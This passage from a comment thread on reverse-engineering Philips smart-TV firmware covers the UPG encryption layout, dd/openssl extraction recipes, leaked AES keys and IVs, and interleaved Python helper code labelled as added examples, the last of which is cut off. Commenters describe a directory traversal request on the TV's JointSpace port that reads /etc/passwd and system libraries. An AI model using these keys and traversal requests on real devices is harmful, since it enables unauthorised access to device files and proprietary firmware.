    | ...                                       |
    +-------------------------------------------+
    | RSA4096 signature (length 0x100)          |
    +-------------------------------------------+

    Plaintext UPG header
    ——————–

    0000:0000 | 44 30 54 4B 53 30 5F 41 75 74 6F 5F 00 31 31 2E | D0TKS0_Auto_.11.
    0000:0010 | 31 00 32 4B 31 33 20 4F 50 4C 46 20 35 30 30 30 | 1.2K13 OPLF 5000
    0000:0020 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….

    AES128 encrypted UPG header
    —————————

    Key: 09291094092910940929109409291094
    IV: 00000000000000000000000000000000

    After decryption:
    0000:0000 | 54 50 56 5F 23 44 48 40 46 69 52 6D 31 31 2E 31 | TPV_#DH@FiRm11.1
    0000:0010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0020 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0040 | 00 00 00 00 00 00 00 00 35 66 3F 09 50 00 00 00 | ……..5f?.P…
    0000:0050 | 50 48 49 4C 49 50 53 5F 32 4B 31 33 5F 48 54 5F | PHILIPS_2K13_HT_
    0000:0060 | 53 56 54 5F 44 4C 00 00 00 00 00 00 00 00 00 00 | SVT_DL……….
    0000:0070 | 8B 93 4D FA 47 B2 3D 6C B4 A6 56 FF DA D0 11 23 | ..MúG²=l´¦VÿÚÐ.#
    0000:0080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….

    AES128 encrypted blocks
    ———————–

    Key: md5sum of /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_AES.key
    IV: md5sum of /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_AES.iv

    Each block has a separate 12-byte header

    +--------+--------+--------+--------+
    |  tag1  |  tag2  | length | data1  |
    +--------+--------+--------+--------+
    | data2  | data3  | data4  |  ...   |
    +--------+--------+--------+--------+

    tag1: 4 ASCII characters
    So far the tags ‘ixml’, ‘edfu’, ‘kern’, ‘3rdp’, ‘pqaq’, ‘root’ and ‘cfig’
    have been encountered.

    tag2: Always 01 00 00 00 (?)

    length: Length of the plaintext payload in bytes.
    The encrypted block is always 60 bytes longer than this value.

    Example (before decryption):
    0000:0000 | 65 64 66 75 01 00 00 00 B4 6F 44 01 EA CC B1 1B | edfu….´oD.ê̱.

    tag1 = ‘edfu’
    tag2 = 00000001
    length = 01446FB4

    The decrypted plaintext has a further 48-byte header:

    +--------------------+
    | 'reserved mtk inc' |
    +--------------------+
    | MD5sum of payload  |
    +--------------------+
    | reserved (all 0)   |
    +--------------------+

    Example (after decryption):
    0000:0000 | 72 65 73 65 72 76 65 64 20 6D 74 6B 20 69 6E 63 | reserved mtk inc
    0000:0010 | C4 D3 B2 22 C4 85 F1 B9 4A 42 64 35 0D DB 97 FB | ÄÓ²”Ä.ñ¹JBd5.Û.û
    0000:0020 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….

    Thus the total length overhead is 60 bytes (12 bytes block header + 48 bytes plaintext header).

    Inventory
    ———

    The block tagged with ‘ixml’ contains an inventory in XML format, i.e. an XML file listing the contents of the UPG file, including block offsets, lengths, file names and descriptions of the various blocks. If you have already updated the firmware of your TV then you will probably find a copy of this file in /3rd_rw/upgrade/download.xml

    File system images
    ——————

    File system images have yet another 4k header, the content of which is not yet known.
    Obviously it contains an MD5 sum, but so far I wasn’t able to find out which part of the data it covers.

    Example:
    0000:0000 | 4E 46 53 42 02 00 00 00 08 00 02 37 F8 02 6D 64 | NFSB…….7ø.md
    0000:0010 | 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 5……………
    0000:0020 | 02 40 00 00 00 08 61 37 34 66 66 63 36 65 39 30 | .@….a74ffc6e90
    0000:0030 | 63 64 38 37 32 35 31 39 63 36 66 35 38 31 61 34 | cd872519c6f581a4
    0000:0040 | 61 65 36 35 32 34 00 00 00 00 00 00 00 00 00 00 | ae6524……….
    0000:0050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0060 | 00 00 00 00 00 00 00 16 0A 45 23 14 18 53 01 1E | ………E#..S..
    0000:0070 | DB 8A 10 46 BF 48 43 71 D7 9A 73 1F 6C 59 66 DB | Û..F¿HCq×.s.lYfÛ
    0000:0080 | BC 94 61 CD 44 F7 CB A5 FC EF 21 C3 C0 F1 95 79 | ¼.aÍD÷Ë¥üï!ÃÀñ.y
    0000:0090 | 9E 70 E0 65 5E 2A AB FC 6F D4 F7 35 13 4E CD E0 | .pàe^*«üoÔ÷5.NÍà
    0000:00A0 | B5 2B EA 2D 8E 7C 9E DA F8 5E E6 25 BA 4D 32 1F | µ+ê-.|.Úø^æ%ºM2.
    0000:00B0 | 51 17 F6 B6 BB A9 E7 9A 8B C7 BD C0 15 8F 8D 47 | Q.ö¶»©ç..ǽÀ…G
    0000:00C0 | 51 00 5E A0 98 BB 2B 44 87 09 0D A4 58 31 B0 4A | Q.^ .»+D…¤X1°J
    0000:00D0 | 5F FA 02 6D 9E BB 00 24 DC BF 32 4E 8C E3 A8 DD | _ú.m.».$Ü¿2N.ã¨Ý
    0000:00E0 | 2A FC 8F 46 93 F8 2F 00 00 00 00 00 00 00 00 00 | *ü.F.ø/………
    0000:00F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
    0000:0110 | … (0-padding to 0x3ff)

    Furthermore, the Squashfs images use LZO compression, thus you need to make sure that your Linux kernel (or your squashfs-tools) supports LZO/LZMA compression.

    RSA signature
    ————-

    The meaning of the last 256 bytes of the UPG file is not clear yet. However, since there’s a 4096 bit RSA public key file on the TV, this block is likely the RSA signature of the UPG file. So far I have not been able to verify the file using the public key, though.

    1. Luis D
      Luis D January 11, 2014 at 03:54 . Reply

      Thanks Brandy, can you post the commands to extract the files? I’m not good at hex editing and gpg.
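The comment above leaves the trailing 256 bytes unverified. As an added example (Python, not code from the post, from any commenter or from Philips/TP Vision), here is the check a practitioner would do before guessing hash algorithms: apply the raw RSA public-key operation to the trailing block and see whether the result has PKCS#1 v1.5 shape (00 01 FF..FF 00 DigestInfo||hash), which reveals the digest algorithm directly; then compare that digest with a hash over the file minus the signature. The PEM parser is self-contained and is fed the 42PFL4208 public key posted in comment 85 as sample input. That key parses as 2048-bit, which is exactly what a 256-byte signature implies (a 4096-bit modulus would give 512-byte signatures), so the block length itself is a useful check on which key file is the right one. The DigestInfo table, the function names and the choice of "everything before the signature" as the signed range are this example's assumptions; a non-PKCS#1 result may mean PSS, a different signed range, or no signature at all.

```python
import base64
import hashlib

# 2048-bit public key as posted in this thread for the 42PFL4208 (sample input, comment 85).
PUBKEY_42PFL4208 = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu8cydwafYt4F1Nx00plg
ldsAV2HAbq6ATHKEaAIqtSkCKeOXG13J85EZVwgCxDQsFILXjk8/J8Sc3hVOfiiq
MAkbqF3DxBWZoVMHRr9x75tQklUw8vRqu5jJ2mfURcPoUFiW3mHs/IT1P8TePp99
r8IPGjP+j2RscoKTdSy7fvGAQYCDBhIG0nVtnqsL9r7lvFBQr16nw7G/E6FytxxT
NOnMOVa/w7LAGIHamcmFJeMtqfGEnBI89gkuzJFEGvf9EbnCDNvYT0F7+TFT1us6
/q3+u4L6u1Jm8YaYlEVHm66/RPbd8Lw4PrP22l8QGcaKYUAC9ZwBvOosToj09NTL
nwIDAQAB
-----END PUBLIC KEY-----"""

# DigestInfo prefixes from RFC 8017 section 9.2 (DER AlgorithmIdentifier + OCTET STRING tag/length).
DIGEST_INFO = {
    "md5":    bytes.fromhex("3020300c06082a864886f70d020505000410"),
    "sha1":   bytes.fromhex("3021300906052b0e03021a05000414"),
    "sha256": bytes.fromhex("3031300d060960864801650304020105000420"),
}


def _tlv(buf: bytes, pos: int):
    """Decode one DER tag-length-value at pos; return (tag, value_start, value_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: the next (length & 0x7f) bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, pos, pos + length


def parse_rsa_public_key(pem: str):
    """SubjectPublicKeyInfo PEM -> (n, e) for an RSA key, without third-party libraries."""
    body = "".join(line for line in pem.splitlines() if not line.startswith("-----"))
    der = base64.b64decode(body)
    _, spki, _ = _tlv(der, 0)                   # outer SEQUENCE
    _, _, alg_end = _tlv(der, spki)             # AlgorithmIdentifier SEQUENCE (skipped)
    tag, bits, bits_end = _tlv(der, alg_end)    # BIT STRING wrapping RSAPublicKey
    assert tag == 0x03, "expected BIT STRING"
    rsa = der[bits + 1:bits_end]                # skip the unused-bits byte
    _, seq, _ = _tlv(rsa, 0)                    # RSAPublicKey SEQUENCE
    _, n0, n1 = _tlv(rsa, seq)                  # INTEGER modulus
    _, e0, e1 = _tlv(rsa, n1)                   # INTEGER publicExponent
    return int.from_bytes(rsa[n0:n1], "big"), int.from_bytes(rsa[e0:e1], "big")


def rsa_public_op(sig: bytes, n: int, e: int):
    """Raw RSA: recover the encoded message sig^e mod n, or None if sig cannot be a signature under n."""
    k = (n.bit_length() + 7) // 8
    s = int.from_bytes(sig, "big")
    if len(sig) != k or s >= n:
        return None
    return pow(s, e, n).to_bytes(k, "big")


def classify_pkcs1(em):
    """If em is EMSA-PKCS1-v1_5 (00 01 FF..FF 00 DigestInfo hash), return (hash_name, hash), else None."""
    if em is None or em[:2] != b"\x00\x01":
        return None
    sep = em.find(b"\x00", 2)
    if sep < 10 or em[2:sep] != b"\xff" * (sep - 2):   # at least 8 bytes of 0xFF padding
        return None
    t = em[sep + 1:]
    for name, prefix in DIGEST_INFO.items():
        if t.startswith(prefix) and len(t) == len(prefix) + hashlib.new(name).digest_size:
            return name, t[len(prefix):]
    return None


def pkcs1_encode(name: str, digest: bytes, k: int) -> bytes:
    """Build the EM a PKCS#1 v1.5 signer would produce for a k-byte modulus (shows the layout)."""
    t = DIGEST_INFO[name] + digest
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def check_trailing_signature(upg: bytes, n: int, e: int):
    """Treat the last k bytes of the UPG as a signature over everything before them.

    Returns (hash_name_or_None, matches_body). A name with matches_body False means the
    block is PKCS#1-shaped but signs a different range (or the file was modified)."""
    k = (n.bit_length() + 7) // 8
    found = classify_pkcs1(rsa_public_op(upg[-k:], n, e))
    if found is None:
        return None, False
    name, digest = found
    return name, hashlib.new(name, upg[:-k]).digest() == digest


if __name__ == "__main__":
    import sys  # usage: python3 upgsig.py Autorun.upg pubkey.pem
    with open(sys.argv[1], "rb") as f, open(sys.argv[2]) as p:
        print(check_trailing_signature(f.read(), *parse_rsa_public_key(p.read())))
```

If `check_trailing_signature` returns a hash name but `False`, try other candidate ranges (for example the file without its own header, or each block separately) with the same `classify_pkcs1` result before concluding the block is not a signature.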

  69. kazakoffd
    kazakoffd January 10, 2014 at 22:08 . Reply

    Good job! It’s nice to hear that somebody has an interest in hacking phTV!
    P.S. Doesn’t work on pfl5507 with latest firmware, will try to downgrade ;(

  70. brandy
    brandy January 12, 2014 at 14:08 . Reply

    Well, due to the non-standard encryption you won’t be able to decrypt all parts using standard tools without a bit of hex editing. This only works for those parts with a size which is a multiple of 16 bytes. Luckily, for the file system images this is the case.

    As an example, here’s a recipe to extract the root file system image using only standard Linux tools:

    Start by finding its offset in the UPG file

    > grep -oba root Autorun.upg
    > 24916963:root
    > 99079517:root

    Unfortunately, the string ‘root’ occurs twice, so we need to find out which is the correct one:

    > hexdump -C -s 24916963 -n 16 Autorun.upg
    > 017c33e3 72 6f 6f 74 e9 62 4d 46 a4 61 80 ff 33 fc 9d 60 |root.bMF.a..3..`|

    This doesn’t seem to be the right one since ‘root’ isn’t followed by the byte sequence 01 00 00 00. Thus, we try the next offset.

    > hexdump -C -s 99079517 -n 16 Autorun.upg
    > 05e7d55d 72 6f 6f 74 01 00 00 00 00 90 57 03 ea cc b1 1b |root……W…..|

    There we are. The offset is 99079517 and the length is 0x03579000 (56070144).

    Now we extract the encrypted image from Autorun.upg.
    Remember that the encrypted image still has a 48-byte header, thus we must add 48 to the length. Furthermore, we don’t want to extract the 12-byte block header, thus we add 12 to the offset.

    > dd if=Autorun.upg of=tmp1.bin bs=99079529 skip=1
    > dd if=tmp1.bin of=tmp2.bin bs=56070192 count=1

    The same result could as well be achieved using the single command shown below, but that would be terribly slow.
    > dd if=Autorun.upg of=tmp2.bin bs=1 skip=99079529 count=56070192

    Now we can decrypt the image using the AES key and init vector retrieved by running md5sum on the corresponding files in /3rd_ro/keys:
    > openssl enc -d -aes128 -in tmp2.bin -out tmp3.bin -nopad \
    -K d378eaf81d378a801b556985789a7c31 \
    -iv 73079fd19183715e130858588479c652

    Strip off the 48-byte header:

    > dd if=tmp3.bin of=tmp4.bin bs=48 skip=1

    If you’re lucky then the result is already the Squashfs image. On some TV models there’s still an additional 4k header before the actual image, though. If your image starts with the byte sequence 4E 46 53 42 (‘NFSB’) then it has the additional header which must be stripped:

    > dd if=tmp4.bin of=rootfs.img bs=4096 skip=1

    Voilà. This is the root file system image which you can now either mount via the loop device or extract using the ‘unsquashfs’ tool.
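To automate the offset hunt in the recipe above, here is an added Python example; it is not code from the post, from any commenter or from Philips/TP Vision tooling. It scans a UPG file for the 12-byte block header the thread describes (four lowercase tag letters, the word 01 00 00 00, then a little-endian length), discards hits where the tag is merely a string inside encrypted data (the first ‘root’ above fails the 01 00 00 00 test), and derives the dd skip/count values (offset + 12, length + 48) together with equivalent shell commands. Assumptions beyond the thread: every block uses this header layout, the encrypted region is always length + 48 bytes, and the generated dd line relies on GNU dd’s `iflag=skip_bytes,count_bytes` so that bs=1 is not needed. The embedded sample file is constructed for the demonstration and is not a real firmware image.

```python
import re
import struct

BLOCK_HEADER = 12   # 4-byte tag + 4 bytes 01 00 00 00 + 4-byte little-endian payload length
PLAIN_HEADER = 48   # plaintext header that sits inside every encrypted block
# Block header as described in the thread: lowercase 4-letter tag, then 01 00 00 00, then the length.
TAG_RE = re.compile(rb"([a-z]{4})\x01\x00\x00\x00(.{4})", re.DOTALL)


def scan_blocks(upg: bytes):
    """Return [(tag, block_offset, payload_len)] for every plausible block header.

    A hit is kept only if its encrypted region (payload_len + 48 bytes) fits inside the
    file; a tag string that merely occurs inside encrypted data fails the 01 00 00 00
    test or this size test.
    """
    blocks, pos = [], 0
    while True:
        m = TAG_RE.search(upg, pos)
        if m is None:
            break
        off = m.start()
        payload_len = struct.unpack("<I", m.group(2))[0]   # little endian, as in the thread
        if off + BLOCK_HEADER + payload_len + PLAIN_HEADER <= len(upg):
            blocks.append((m.group(1).decode("ascii"), off, payload_len))
        pos = off + 1
    return blocks


def dd_parameters(block_offset: int, payload_len: int):
    """skip/count in bytes for dd: skip the 12-byte block header, keep payload + 48-byte header."""
    return block_offset + BLOCK_HEADER, payload_len + PLAIN_HEADER


def extract_block(upg: bytes, block_offset: int, payload_len: int) -> bytes:
    """The same bytes dd would produce, sliced in memory."""
    skip, count = dd_parameters(block_offset, payload_len)
    return upg[skip:skip + count]


def extraction_commands(tag, block_offset, payload_len, upg_name="Autorun.upg",
                        key_hex="<md5 of AES.Key>", iv_hex="<md5 of AES.Iv>"):
    """Shell commands equivalent to the recipe in the thread (GNU dd byte flags avoid bs=1)."""
    skip, count = dd_parameters(block_offset, payload_len)
    return [
        f"dd if={upg_name} of={tag}.enc bs=1M skip={skip} count={count} iflag=skip_bytes,count_bytes",
        f"openssl enc -d -aes-128-cbc -nopad -in {tag}.enc -out {tag}.dec -K {key_hex} -iv {iv_hex}",
        f"dd if={tag}.dec of={tag}.img bs={PLAIN_HEADER} skip=1",
    ]


def build_sample_upg() -> bytes:
    """Constructed stand-in for Autorun.upg (not real firmware): a 64-byte dummy file header,
    an 'ixml' block with a 20-byte payload and a 'root' block whose payload contains the
    string 'root' followed by other bytes, like the false hit in the thread."""
    def block(tag, payload):
        header = tag + b"\x01\x00\x00\x00" + struct.pack("<I", len(payload))
        return header + b"\x11" * PLAIN_HEADER + payload
    decoy = b"\xaa" * 30 + b"root\xe9bMF" + b"\xaa" * 30   # 'root' not followed by 01 00 00 00
    return b"\x00" * 64 + block(b"ixml", bytes(range(20))) + block(b"root", decoy)


if __name__ == "__main__":
    sample = build_sample_upg()
    for tag, off, length in scan_blocks(sample):
        print(tag, off, length, dd_parameters(off, length))
        print("\n".join(extraction_commands(tag, off, length)))
```

On a real file, `scan_blocks(open("Autorun.upg", "rb").read())` lists every tagged block; the openssl line only works as-is when the payload length is a multiple of 16, as the post says, and the image may still carry the 4 KiB ‘NFSB’ header after the 48-byte one.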

  71. brandy
    brandy January 13, 2014 at 19:32 . Reply

    @kazakoffd:
    Yes, I’ve just downloaded the PFL5507 firmware and the UPG file structure looks very different. The PFL3208 firmware does however use the same structure and encryption as my PFL4208. It seems that Philips uses at least two different methods to encrypt the firmware files.

    1. kazakoffd
      kazakoffd January 16, 2014 at 11:10 . Reply

      I can’t repeat this hack to get files from TV…. :((

      1. brandy
        brandy January 16, 2014 at 20:55 . Reply

        Using which firmware? It will certainly not work with the one for the PFL5507.

        1. kazakoffd
          kazakoffd January 17, 2014 at 06:45 . Reply

          I tried it on two versions: FUS_Q554E_0_100_0_0 and FUS_Q554E_0_93_0_0

  72. Donovan
    Donovan January 20, 2014 at 23:53 . Reply

    I can confirm that 46PFL5507K/12 does not have port 1925 open :-(
    I can’t find the webserver either, which was mentioned below.
    Jointspace can be activated with the key combination, though the only open ports I found are 2323 and 49153.

    Has anybody tried to sniff the Jointspace traffic? How is it sent to the TV?

    1. Donovan
      Donovan January 21, 2014 at 00:12 . Reply

      Seems like 49153 is a webserver, so far I found one page
      http://192.168.178.77:49153/nmrDescription.xml
      And there are links to other xml files inside

      1. brandy
        brandy January 21, 2014 at 18:47 . Reply

        According to nmap these ports are open on my 42PFL4208 (the descriptions are also from nmap):

        1925 unknown
        2323 3d-nfsd
        2870 unknown
        36510 Mongoose httpd
        46714 Mongoose httpd

        I haven’t managed to establish a connection to any one of them except 1925, though.

        1. Donovan
          Donovan January 21, 2014 at 20:07 . Reply

          Can you give me your nmap options (or are you using some other program)? I can’t find any except the ones I’ve mentioned above…

          Anyway I managed to get into port 1925 using these steps
          1. Download pcremote https://github.com/netdata/pcremote
          2. Once the javascript remote is loaded in a browser I can access port 1925 with telnet which was refused before :-D

          Unfortunately none of the exploits from here http://sitsec.net/blog/ work for me.
          Seems like they changed the http server or config options for this series.

  73. Thomas
    Thomas January 22, 2014 at 15:45 . Reply

    I have a 46PFL5007K running firmware Q554E_0.99.0.0 and port 1925 is definitely open if you have successfully enabled JointSpace. Have you used nmap to check if the port is open? nmap does not scan port 1925 by default.

    However, the TV550R4 models seem not to be vulnerable to directory traversal. My TV always returns a 404 error.

    By the way: According to http://sitsec.net/blog/2013/09/16/jointspace-server-directory-traversal-vulnerability-on-a-philips-6000-series-smart-led-tv/ someone found the vulnerability already in September 2013. He writes that he informed Philips about his discovery. Maybe the access is or will be closed in newer firmwares.

    Port 49153 is used for UPNP-Streaming. nmap identifies it as “Philips Intel UPnP SDK 1.4 (Philips Smart TV; UPnP 1.0; DLNADOC 1.50)”.

  74. Mike
    Mike February 3, 2014 at 17:27 . Reply

    Has anyone been lucky with a xxPFLxxx6 / Q5551 TV?

    My 42PFL7606 has Jointspace enabled (port 1925 is open), but the directory traversal bug is not present.
    I have tried with different firmware versions from 000.014.096.000 to 000.014.105.000, but no luck :(

  75. fgeorge
    fgeorge February 18, 2014 at 05:47 . Reply
  76. audiobriAn
    audiobriAn February 21, 2014 at 14:50 . Reply

    Just a Philips Ambilight 55 PFL8008 javascript test site: http://www.freakpoint.com.ar/philips2k12.html

  77. fgeorge
    fgeorge March 4, 2014 at 11:46 . Reply

    I have a Philips tv 47PFL5007G/78 with firmware L12M11L_1.5.10.

    >strings libmtkapp.so | grep /key/
    /ro_data/key/PhilipsTV_M2K12PLF_UPG_PubKey.pem
    /ro_data/key/PhilipsTV_M2K12PLF_UPG_AES.Key
    /ro_data/key/PhilipsTV_M2K12PLF_UPG_AES.Iv

    >grep -oba root Autorun.upg
    2191472:root

    >hexdump -C -s 2191472 -n 16 Autorun.upg
    00217070 72 6f 6f 74 01 00 00 00 00 20 85 02 f5 df 26 ae |root….. ….&.|
    00217080

    >dd if=Autorun.upg of=tmp1.bin bs=2191484 skip=1
    >dd if=tmp1.bin of=tmp2.bin bs=42278960 count=1
    >openssl enc -d -aes128 -in tmp2.bin -out tmp3.bin -nopad -K 2F420647EAB3A49EF95892494DE213EE -iv E27B94F583EC30A034651DCB0788BACB

    >dd if=tmp3.bin of=tmp4.bin bs=48 skip=1
    >dd if=tmp4.bin of=rootfs.img bs=4096 skip=1
    >unsquashfs rootfs.img
    Can’t find a SQUASHFS superblock on rootfs.img

    1. brandy
      brandy March 17, 2014 at 22:05 . Reply

      You used the AES key and iv from the files directly; this won’t work. Instead, you must run md5sum over these files and use the returned md5 sums as key and iv values.

      > md5sum /ro_data/key/PhilipsTV_M2K12PLF_UPG_AES.Key
      => 47fbf8cad62bb95af3ad9509e5c2175d

      > md5sum /ro_data/key/PhilipsTV_M2K12PLF_UPG_AES.Iv
      => 63120fb321b0410f216d6dc2d8641a11

      When using the two resulting md5 sums as key and iv then the decoding works.

      1. fgeorge
        fgeorge March 18, 2014 at 18:10 . Reply

        Thank you!!!!! I got the firmware root image.

      2. fgeorge
        fgeorge March 18, 2014 at 23:06 . Reply

        How do I rebuild the firmware?

        1. brandy
          brandy March 19, 2014 at 19:20 . Reply

          I don’t think that this is possible; that’s why I’ve basically given up this approach.

          Firstly, the whole download file is signed using RSA, the corresponding public key is the one stored in /3rd_ro/key. (Actually, as far as I understood the disassembly of the corresponding code, this is not even checked, but I won’t rule out that I made a mistake here and misunderstood the assembler code.)

          Secondly, the Squashfs images are also signed using RSA, the public key being hard-coded in the kernel, and this one is definitely verified.

          So, unless someone gets hold of the private keys, creating your own firmware will be next to impossible.

  78. kopierschnitte
    kopierschnitte March 16, 2014 at 08:46 . Reply

    The traversal exploit still works on the 8008S!
    But how can we use this to execute code? For gaining shell access, e.g.

  79. kopierschnitte
    kopierschnitte March 18, 2014 at 07:44 . Reply

    How did you find libmtkapp.so? On my TV, it doesn’t exist in /lib

    1. fgeorge
      fgeorge March 18, 2014 at 18:14 . Reply

      You will find in /basic folder.

      1. kopierschnitte
        kopierschnitte March 18, 2014 at 18:31 . Reply

        No, GET /../../../../../basic/libmtkapp.so gives me a 404 :-(

        1. fgeorge
          fgeorge March 18, 2014 at 19:26 . Reply
  80. kopierschnitte
    kopierschnitte March 18, 2014 at 22:31 . Reply

    Nothing. Seems that TPVision moved that particular library in the 2013 models. I can safely download /etc/passwd or /proc/1/exe (init) but the mentioned lib seems to be absent on my model. Is there any way to actively “find” the name and location of this or other files?

    1. brandy
      brandy March 19, 2014 at 18:58 . Reply

      Well, I started with downloading and inspecting /etc/inittab and then downloading and inspecting every file subsequently referenced. On my TV, PATH and LD_LIBRARY_PATH is set in /etc/profile, this gives some likely locations of libraries. In the case of binary files I used objdump to get the list of linked libraries and downloaded them as well. I often had to try several of the library paths until I found the correct one, though.

  81. kopierschnitte
    kopierschnitte March 19, 2014 at 19:09 . Reply

    Yes, that’s a good source of information … but still no evidence of libmtkapp.so :-(
    Can you tell us which binaries you’ve inspected using objdump?
    Unfortunately, even /etc/inittab is missing on my TV.

    1. brandy
      brandy March 19, 2014 at 19:52 . Reply

      No /etc/inittab? That’s very strange indeed.

      On my TV, there’s a script file /basic/autorun.sh which checks for the presence of the following binaries and starts them if they exist:

      /basic/ut_drv (does not exist)
      /basic/app_man
      /basic/dtv_svc
      /basic/mtkapp (does not exist)

      /basic/dtv_svc links libmtkapp.so

      1. kopierschnitte
        kopierschnitte March 19, 2014 at 20:03 . Reply

        Yes, no inittab … but at least an fstab which might get me a little idea about the mounting points. Strange, there’s also an NFS import :?
        The /basic folder doesn’t exist on my TV but there’s a /philips subfolder (and /philips/lib). Maybe they’ve relocated everything a little bit.

    2. brandy
      brandy March 19, 2014 at 19:59 . Reply

      BTW: You could download the firmware upgrade of the 42PFL4208 and extract the root file system image as described in my earlier post. Then you could check whether you find any of these files on your TV. But it seems that your firmware is very different than mine, so maybe libmtkapp.so does not exist there at all.

      1. kopierschnitte
        kopierschnitte March 20, 2014 at 00:13 . Reply

        Okay, tracked it down to a call to AESdecrypt within pflApp but I’m unable to guess the name of the related library which exports this symbol. I’m doing this using IDA.

  82. fgeorge
    fgeorge March 22, 2014 at 11:54 . Reply

    I think it might be impossible to obtain root access on this smart TV.

    1. kopierschnitte
      kopierschnitte March 24, 2014 at 22:02 . Reply

      Don’t get me wrong but I hope you’re not right ;-)
      With a little bit of knowledge about MIPS assembler, one should be able to reconstruct the packaging and signing process. I mean, we have access to all relevant binaries and I really think that everything we need is stored on the TV itself.

  83. fgeorge
    fgeorge March 29, 2014 at 21:03 . Reply

    Is there any chance to root for the serial port?

  84. kopierschnitte
    kopierschnitte March 30, 2014 at 00:37 . Reply

    Okay, now the directory traversal exploit has been made public along with the Miracast exploit. See http://securityaffairs.co/wordpress/23523/hacking/philips-smarttv-susceptible-serious-hack-according-revuln-experts.html

    I guess, our backdoor will be closed very soon now :-(

  85. Thomas
    Thomas April 6, 2014 at 14:46 . Reply

    @brandy: I am trying to write a script that automatically extracts and decrypts a firmware image. I am struggling with the decryption of blocks that have a length which is not a multiple of 16 bytes. You wrote that the bytes of the incomplete last block must be XORed with the corresponding bytes of the AES key. I am not sure if I understand this right.
    For example this is what I did to decrypt the XML file of the 47PFL5007G firmware:

    $ dd if=Autorun.upg of=tmp1 bs=$((272+12)) skip=1

    $ hexdump -C -s 272 -n 12 Autorun.upg
    00000110 69 78 6d 6c 01 00 00 00 c4 7f 00 00 |ixml….Ä…|

    $ dd if=tmp1 of=tmp2 bs=$((0x00007fc4 + 48)) count=1 # 32756 bytes
    $ dd if=tmp2 of=tmp3 bs=32752 count=1
    $ hexdump -C -s 32752 tmp2
    00007ff0 67 db d8 ea |gÛØê|

    XOR(67dbd8ea,2F420647EAB3A49EF95892494DE213EE)=4899deadeab3a49ef95892494de213ee (result written to file tmp4):

    $ hexdump -C tmp4
    00000000 48 99 de ad ea b3 a4 9e f9 58 92 49 4d e2 13 ee |H.Þ­ê³€.ùX.IMâ.î|

    $ cat tmp3 tmp4 > tmp5
    $ openssl enc -d -aes128 -in tmp5 -out ixml -nopad -K 47fbf8cad62bb95af3ad9509e5c2175d -iv 63120fb321b0410f216d6dc2d8641a11
    $ hexdump -C -s 32000 ixml
    00007d00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |                |
    *
    00007ff0 2f 45 8d ab af 9c 83 9c 4c 1d 8c aa 53 fb 99 3e |/E.«¯…L..ªSû.>|

    I assume that the last bytes should be all 0x20. What am I doing wrong?

    Could you also please post the keys for the 2013 models including the public key?

    1. brandy
      brandy April 13, 2014 at 12:47 . Reply

      Sorry, my fault, I wrote “must be XORed with the AES key” but actually meant “… with the md5sum of the AES key”.

      This will then indeed result in a sequence of 4 * 0x20.

      I only have the keys of my 42PFL4208:

      AES key:
      4816CA3649F0426FDFBAF1F56765A6FD
      AES iv:
      21F3680FFC43245087443E56405FB250
      PubKey:
      -----BEGIN PUBLIC KEY-----
      MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu8cydwafYt4F1Nx00plg
      ldsAV2HAbq6ATHKEaAIqtSkCKeOXG13J85EZVwgCxDQsFILXjk8/J8Sc3hVOfiiq
      MAkbqF3DxBWZoVMHRr9x75tQklUw8vRqu5jJ2mfURcPoUFiW3mHs/IT1P8TePp99
      r8IPGjP+j2RscoKTdSy7fvGAQYCDBhIG0nVtnqsL9r7lvFBQr16nw7G/E6FytxxT
      NOnMOVa/w7LAGIHamcmFJeMtqfGEnBI89gkuzJFEGvf9EbnCDNvYT0F7+TFT1us6
      /q3+u4L6u1Jm8YaYlEVHm66/RPbd8Lw4PrP22l8QGcaKYUAC9ZwBvOosToj09NTL
      nwIDAQAB
      -----END PUBLIC KEY-----
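The two corrections in this exchange (key and IV are the MD5 digests of the key files; bytes that don’t fill a final 16-byte block are XORed with that derived key instead of going through AES) combined into an added Python example. It is not code from the post, from the commenters or from Philips/TP Vision. It decrypts one already-extracted block: the aligned part goes through AES-128-CBC with no padding (delegated to the openssl command line, as in the recipe in comment 70), the leftover bytes are XORed with the key, then the 48-byte header and, where the data starts with ‘NFSB’, the 4 KiB header are stripped and the ‘hsqs’ magic is checked. The ixml tail bytes 67 db d8 ea and the 47PFL5007G key quoted in this thread serve as sample data; the XOR yields the four 0x20 bytes mentioned above. Nothing is read from the NFSB header beyond its size and magic, since its layout is not known.

```python
import hashlib
import subprocess

PLAIN_HEADER = 48      # plaintext header at the start of every decrypted block
NFSB_HEADER = 4096     # extra header on file system images, starts with 'NFSB'
SQUASHFS_MAGIC = b"hsqs"

# Values quoted in the thread: MD5 digests of the .Key/.Iv files of a 47PFL5007G, and the
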